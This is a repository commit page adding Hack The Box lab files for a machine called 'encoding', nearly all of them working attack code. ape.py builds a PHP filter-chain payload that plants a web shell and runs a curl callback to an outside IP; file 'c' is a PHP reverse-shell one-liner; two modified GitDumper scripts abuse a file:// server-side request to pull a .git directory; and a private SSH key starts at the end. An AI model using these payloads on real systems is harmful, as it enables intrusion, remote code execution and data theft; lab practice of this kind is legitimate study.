simon/CTF
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

init htb

Browse Source 
old htb folders
This commit is contained in:
Simon
2023-08-29 21:53:22 +02:00
parent 62ab804867
commit 82b0759f1e
21891 changed files with 6277643 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

104
HTB/encoding/ape.py Normal file
View File

@@ -0,0 +1,104 @@
import requests
url = "http://haxtables.htb/handler.php"
file_to_use = "/etc/passwd"
command = "curl http://10.10.14.61/"
#<?=`$_GET[0]`;;?>
base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4"
conversions = {
'0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',
'1': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.OSF1002035D.EUC-KR|convert.iconv.MAC-CYRILLIC.T.61-8BIT|convert.iconv.1046.CSIBM864|convert.iconv.OSF1002035E.UCS-4BE|convert.iconv.EBCDIC-INT1.IBM943',
'2': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO6937.OSF1002011C|convert.iconv.CP1146.EUCJP-OPEN|convert.iconv.IBM1157.UTF8',
'3': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO8859-7.CSISOLATIN3|convert.iconv.ISO-8859-9.CP905|convert.iconv.IBM1112.CSPC858MULTILINGUAL|convert.iconv.EBCDIC-CP-NL.ISO-10646',
'4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2',
'5': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.RUSCII.IBM275|convert.iconv.CSEBCDICFR.CP857|convert.iconv.EBCDIC-CP-WT.ISO88591',
'6': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-37.MACUK|convert.iconv.CSIBM297.ISO-IR-203',
'7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',
'8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
'9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',
'a': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSIBM9066.CP1371|convert.iconv.KOI8-RU.OSF00010101|convert.iconv.EBCDIC-CP-FR.ISO-IR-156',
'b': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP1399.UCS4',
'c': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.8859_9.OSF100201F4|convert.iconv.IBM1112.CP1004|convert.iconv.OSF00010007.CP285|convert.iconv.IBM-1141.OSF10020402',
'd': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',
'e': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSISO27LATINGREEK1.SHIFT_JISX0213|convert.iconv.IBM1164.UCS-4',
'f': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213',
'g': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022CN.CP855|convert.iconv.CSISO49INIS.IBM1142',
'h': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.THAI8.OSF100201B5|convert.iconv.NS_4551-1.CP1160|convert.iconv.CP275.IBM297',
'i': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.GB_198880.IBM943|convert.iconv.CUBA.CSIBM1140',
'j': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSISO27LATINGREEK1.UCS-4BE|convert.iconv.IBM857.OSF1002011C',
'k': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO88594.CP912|convert.iconv.ISO-IR-121.CP1122|convert.iconv.IBM420.UTF-32LE|convert.iconv.OSF100201B5.IBM-1399',
'l': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSISO90.MACIS|convert.iconv.CSIBM865.10646-1:1993|convert.iconv.ISO_69372.CSEBCDICATDEA',
'm': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.GB_198880.CSSHIFTJIS|convert.iconv.NO2.CSIBM1399',
'n': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.GB_198880.IBM862|convert.iconv.CP860.IBM-1399',
'o': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO8859-6.CP861|convert.iconv.904.UTF-16|convert.iconv.IBM-1122.IBM1390',
'p': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP1125.IBM1146|convert.iconv.IBM284.ISO_8859-16|convert.iconv.ISO-IR-143.IBM-933',
'q': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.NC_NC00-10:81.CSIBM863|convert.iconv.CP297.UTF16BE',
'r': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-86.ISO_8859-4:1988|convert.iconv.TURKISH8.CP1149',
's': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61',
't': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.WINDOWS-1251.CP1364|convert.iconv.IBM880.IBM-1146|convert.iconv.IBM-935.CP037|convert.iconv.IBM500.L3|convert.iconv.CP282.TS-5881',
'u': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO_6937:1992.ISO-IR-121|convert.iconv.ISO_8859-7:1987.ANSI_X3.110|convert.iconv.CSIBM1158.UTF16BE',
'v': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.HU.ISO_6937:1992|convert.iconv.CSIBM863.IBM284',
'w': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO_6937-2:1983.857|convert.iconv.8859_3.EBCDIC-CP-FR',
'x': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP1254.ISO-IR-226|convert.iconv.CSMACINTOSH.IBM-1149|convert.iconv.EBCDICESA.UCS4|convert.iconv.1026.UTF-32LE',
'y': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.EBCDIC-INT1.IBM-1399',
'z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS',
'A': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-111.IBM1130|convert.iconv.L1.ISO-IR-156',
'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
'C': 'convert.iconv.UTF8.CSISO2022KR',
'D': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',
'E': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.LATIN7.MACINTOSH|convert.iconv.CSN_369103.CSIBM1388',
'F': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSIBM9448.ISO-IR-103|convert.iconv.ISO-IR-199.T.61|convert.iconv.IEC_P27-1.CP937',
'G': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO_8859-3:1988.CP1142|convert.iconv.CSIBM16804.CSIBM1388',
'H': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.GB_198880.EUCJP-OPEN|convert.iconv.CP5347.CP1144',
'I': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO8859-6.DS2089|convert.iconv.OSF0004000A.CP852|convert.iconv.HPROMAN8.T.618BIT|convert.iconv.862.CSIBM1143',
'J': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.US.ISO-8859-13|convert.iconv.CP9066.CSIBM285',
'K': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.IBM1097.UTF-16BE',
'L': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ECMACYRILLIC.IBM256|convert.iconv.GEORGIAN-ACADEMY.10646-1:1993|convert.iconv.IBM-1122.IBM920',
'M': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.SE2.ISO885913|convert.iconv.866NAV.ISO2022JP2|convert.iconv.CP857.CP930',
'N': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.IBM9066.UTF7|convert.iconv.MIK.CSIBM16804',
'O': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-197.CSIBM275|convert.iconv.IBM1112.UTF-16BE|convert.iconv.ISO_8859-3:1988.CP500',
'P': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213',
'Q': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.NO.CP275|convert.iconv.EBCDIC-GREEK.CP936|convert.iconv.CP922.CP1255|convert.iconv.MAC-IS.EBCDIC-CP-IT',
'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',
'S': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP1154.UCS4',
'T': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.IBM1163.CP1388|convert.iconv.OSF10020366.MS-MAC-CYRILLIC|convert.iconv.ISO-IR-25.ISO-IR-85|convert.iconv.GREEK.IBM-1144',
'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',
'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5',
'W': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2',
'X': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.OSF10020388.IBM-935|convert.iconv.CP280.WINDOWS-1252|convert.iconv.CP284.IBM256|convert.iconv.CP284.LATIN1',
'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2',
'Z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSISO90.CSEBCDICFISE',
'+': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ANSI_X3.4-1986.CP857|convert.iconv.OSF10020360.ISO885913|convert.iconv.EUCCN.UTF7|convert.iconv.GREEK7-OLD.UCS4',
'=': ''
}
# generate some garbage base64
filters = "convert.iconv.UTF8.CSISO2022KR|"
filters += "convert.base64-encode|"
# make sure to get rid of any equal signs in both the string we just generated and the rest of the file
filters += "convert.iconv.UTF8.UTF7|"
for c in base64_payload[::-1]:
filters += conversions[c] + "|"
# decode and reencode to get rid of everything that isn't valid base64
filters += "convert.base64-decode|"
filters += "convert.base64-encode|"
# get rid of equal signs
filters += "convert.iconv.UTF8.UTF7|"
filters += "convert.base64-decode"
final_payload = f"a@image.haxtables.htb/actions/action_handler.php?page=php://filter/{filters}/resource={file_to_use}&"
# final_payload = f"a@image.haxtables.htb/actions/action_handler.php?page=php://filter/convert.base64-encode|convert.base64-decode/resource={file_to_use}&"
r = requests.post(url, json={
"0": command,
"action": "",
"data":"",
"uri_path": final_payload
})
print(r.text)

1
HTB/encoding/c Normal file
View File

@@ -0,0 +1 @@
php -r '$sock=fsockopen("10.10.16.23",9001);system("sh <&3 >&3 2>&3");'&

2
HTB/encoding/chain.txt Normal file
View File

@@ -0,0 +1,2 @@
[+] The following gadget chain will generate the following code : <?phpinfo()?> (base64 value: PD9waHBpbmZvKCk/Pg)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.ISO-8859-14.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp

1
HTB/encoding/flag.txt Normal file
View File

@@ -0,0 +1 @@
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp

170
HTB/encoding/gitdumper.sh Normal file
View File

@@ -0,0 +1,170 @@
#!/bin/bash
#$1 : URL to download .git from (http://target.com/.git/)
#$2 : Folder where the .git-directory will be created
function init_header() {
cat <<EOF
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########
EOF
}
# get_git_dir "$@" for "--git-dir=asd"
# returns asd in GITDIR
function get_git_dir() {
local FLAG="--git-dir="
local ARGS=${@}
for arg in $ARGS
do
if [[ $arg == $FLAG* ]]; then
echo "${arg#$FLAG}"
return
fi
done
echo ".git"
}
init_header
QUEUE=();
DOWNLOADED=();
BASEURL="$1";
BASEDIR="$2";
GITDIR=$(get_git_dir "$@")
BASEGITDIR="$BASEDIR/$GITDIR/";
if [ $# -lt 2 ]; then
echo -e "\033[33m[*] USAGE: http://target.tld/.git/ dest-dir [--git-dir=otherdir]\033[0m";
echo -e "\t\t--git-dir=otherdir\t\tChange the git folder name. Default: .git"
exit 1;
fi
if [[ ! "$BASEURL" =~ /$GITDIR/$ ]]; then
echo -e "\033[31m[-] /$GITDIR/ missing in url\033[0m";
exit 0;
fi
if [ ! -d "$BASEGITDIR" ]; then
echo -e "\033[33m[*] Destination folder does not exist\033[0m";
echo -e "\033[32m[+] Creating $BASEGITDIR\033[0m";
mkdir -p "$BASEGITDIR";
fi
function start_download() {
#Add initial/static git files
QUEUE+=('HEAD')
QUEUE+=('objects/info/packs')
QUEUE+=('description')
QUEUE+=('config')
QUEUE+=('COMMIT_EDITMSG')
QUEUE+=('index')
QUEUE+=('packed-refs')
QUEUE+=('refs/heads/master')
QUEUE+=('refs/remotes/origin/HEAD')
QUEUE+=('refs/stash')
QUEUE+=('logs/HEAD')
QUEUE+=('logs/refs/heads/master')
QUEUE+=('logs/refs/remotes/origin/HEAD')
QUEUE+=('info/refs')
QUEUE+=('info/exclude')
QUEUE+=('/refs/wip/index/refs/heads/master')
QUEUE+=('/refs/wip/wtree/refs/heads/master')
#Iterate through QUEUE until there are no more files to download
while [ ${#QUEUE[*]} -gt 0 ]
do
download_item ${QUEUE[@]:0:1}
#Remove item from QUEUE
QUEUE=( "${QUEUE[@]:1}" )
done
}
function download_item() {
local objname=$1
local url="$BASEURL$objname"
local hashes=()
local packs=()
#Check if file has already been downloaded
if [[ " ${DOWNLOADED[@]} " =~ " ${objname} " ]]; then
return
fi
local target="$BASEGITDIR$objname"
#Create folder
if dir=$(echo "$objname" | grep -oE "^(.*)/"); then
mkdir -p "$BASEGITDIR/$dir"
fi
#Download file
echo $target
echo $objname
curl -X POST -H 'Content-Type: application/json' --data-binary "{\"action\": \"str2hex\", \"file_url\": \"file:///var/www/image/.git/$objname\"}" 'http://api.haxtables.htb/v3/tools/string/index.php' | jq .data | xxd -r -p > "$target"
#Mark as downloaded and remove it from the queue
DOWNLOADED+=("$objname")
if [ ! -f "$target" ]; then
echo -e "\033[31m[-] Downloaded: $objname\033[0m"
return
fi
echo -e "\033[32m[+] Downloaded: $objname\033[0m"
#Check if we have an object hash
if [[ "$objname" =~ /[a-f0-9]{2}/[a-f0-9]{38} ]]; then
#Switch into $BASEDIR and save current working directory
cwd=$(pwd)
cd "$BASEDIR"
#Restore hash from $objectname
hash=$(echo "$objname" | sed -e 's~objects~~g' | sed -e 's~/~~g')
#Check if it's valid git object
if ! type=$(git cat-file -t "$hash" 2> /dev/null); then
#Delete invalid file
cd "$cwd"
rm "$target"
return
fi
#Parse output of git cat-file -p $hash. Use strings for blobs
if [[ "$type" != "blob" ]]; then
hashes+=($(git cat-file -p "$hash" | grep -oE "([a-f0-9]{40})"))
else
hashes+=($(git cat-file -p "$hash" | strings -a | grep -oE "([a-f0-9]{40})"))
fi
cd "$cwd"
fi
#Parse file for other objects
hashes+=($(cat "$target" | strings -a | grep -oE "([a-f0-9]{40})"))
for hash in ${hashes[*]}
do
QUEUE+=("objects/${hash:0:2}/${hash:2}")
done
#Parse file for packs
packs+=($(cat "$target" | strings -a | grep -oE "(pack\-[a-f0-9]{40})"))
for pack in ${packs[*]}
do
QUEUE+=("objects/pack/$pack.pack")
QUEUE+=("objects/pack/$pack.idx")
done
}
start_download

168
HTB/encoding/gitdumper2.sh Normal file
View File

@@ -0,0 +1,168 @@
#!/bin/bash
#$1 : URL to download .git from (http://target.com/.git/)
#$2 : Folder where the .git-directory will be created
function init_header() {
cat <<EOF
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########
EOF
}
# get_git_dir "$@" for "--git-dir=asd"
# returns asd in GITDIR
function get_git_dir() {
local FLAG="--git-dir="
local ARGS=${@}
for arg in $ARGS
do
if [[ $arg == $FLAG* ]]; then
echo "${arg#$FLAG}"
return
fi
done
echo ".git"
}
init_header
QUEUE=();
DOWNLOADED=();
BASEURL="$1";
BASEDIR="$2";
GITDIR=$(get_git_dir "$@")
BASEGITDIR="$BASEDIR/$GITDIR/";
if [ $# -lt 2 ]; then
echo -e "\033[33m[*] USAGE: http://target.tld/.git/ dest-dir [--git-dir=otherdir]\033[0m";
echo -e "\t\t--git-dir=otherdir\t\tChange the git folder name. Default: .git"
exit 1;
fi
if [[ ! "$BASEURL" =~ /$GITDIR/$ ]]; then
echo -e "\033[31m[-] /$GITDIR/ missing in url\033[0m";
exit 0;
fi
if [ ! -d "$BASEGITDIR" ]; then
echo -e "\033[33m[*] Destination folder does not exist\033[0m";
echo -e "\033[32m[+] Creating $BASEGITDIR\033[0m";
mkdir -p "$BASEGITDIR";
fi
function start_download() {
#Add initial/static git files
QUEUE+=('HEAD')
QUEUE+=('objects/info/packs')
QUEUE+=('description')
QUEUE+=('config')
QUEUE+=('COMMIT_EDITMSG')
QUEUE+=('index')
QUEUE+=('packed-refs')
QUEUE+=('refs/heads/master')
QUEUE+=('refs/remotes/origin/HEAD')
QUEUE+=('refs/stash')
QUEUE+=('logs/HEAD')
QUEUE+=('logs/refs/heads/master')
QUEUE+=('logs/refs/remotes/origin/HEAD')
QUEUE+=('info/refs')
QUEUE+=('info/exclude')
QUEUE+=('/refs/wip/index/refs/heads/master')
QUEUE+=('/refs/wip/wtree/refs/heads/master')
#Iterate through QUEUE until there are no more files to download
while [ ${#QUEUE[*]} -gt 0 ]
do
download_item ${QUEUE[@]:0:1}
#Remove item from QUEUE
QUEUE=( "${QUEUE[@]:1}" )
done
}
function download_item() {
local objname=$1
local url="$BASEURL$objname"
local hashes=()
local packs=()
#Check if file has already been downloaded
if [[ " ${DOWNLOADED[@]} " =~ " ${objname} " ]]; then
return
fi
local target="$BASEGITDIR$objname"
#Create folder
if dir=$(echo "$objname" | grep -oE "^(.*)/"); then
mkdir -p "$BASEGITDIR/$dir"
fi
#Download file
curl -X POST -H 'Content-Type: application/json' --data-binary "{\"action\": \"str2hex\", \"file_url\": \"file:///var/www/image/.git/$objname\"}" 'http://api.haxtables.htb/v3/tools/string/index.php' | jq .data | xxd -r -p > "$target"
#Mark as downloaded and remove it from the queue
DOWNLOADED+=("$objname")
if [ ! -f "$target" ]; then
echo -e "\033[31m[-] Downloaded: $objname\033[0m"
return
fi
echo -e "\033[32m[+] Downloaded: $objname\033[0m"
#Check if we have an object hash
if [[ "$objname" =~ /[a-f0-9]{2}/[a-f0-9]{38} ]]; then
#Switch into $BASEDIR and save current working directory
cwd=$(pwd)
cd "$BASEDIR"
#Restore hash from $objectname
hash=$(echo "$objname" | sed -e 's~objects~~g' | sed -e 's~/~~g')
#Check if it's valid git object
if ! type=$(git cat-file -t "$hash" 2> /dev/null); then
#Delete invalid file
cd "$cwd"
rm "$target"
return
fi
#Parse output of git cat-file -p $hash. Use strings for blobs
if [[ "$type" != "blob" ]]; then
hashes+=($(git cat-file -p "$hash" | grep -oE "([a-f0-9]{40})"))
else
hashes+=($(git cat-file -p "$hash" | strings -a | grep -oE "([a-f0-9]{40})"))
fi
cd "$cwd"
fi
#Parse file for other objects
hashes+=($(cat "$target" | strings -a | grep -oE "([a-f0-9]{40})"))
for hash in ${hashes[*]}
do
QUEUE+=("objects/${hash:0:2}/${hash:2}")
done
#Parse file for packs
packs+=($(cat "$target" | strings -a | grep -oE "(pack\-[a-f0-9]{40})"))
for pack in ${packs[*]}
do
QUEUE+=("objects/pack/$pack.pack")
QUEUE+=("objects/pack/$pack.idx")
done
}
start_download

38
HTB/encoding/id_rsa Normal file
View File

@@ -0,0 +1,38 @@
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAlnPbNrAswX0YLnW3sx1l7WN42hTFVwWISqdx5RUmVmXbdVgDXdzH
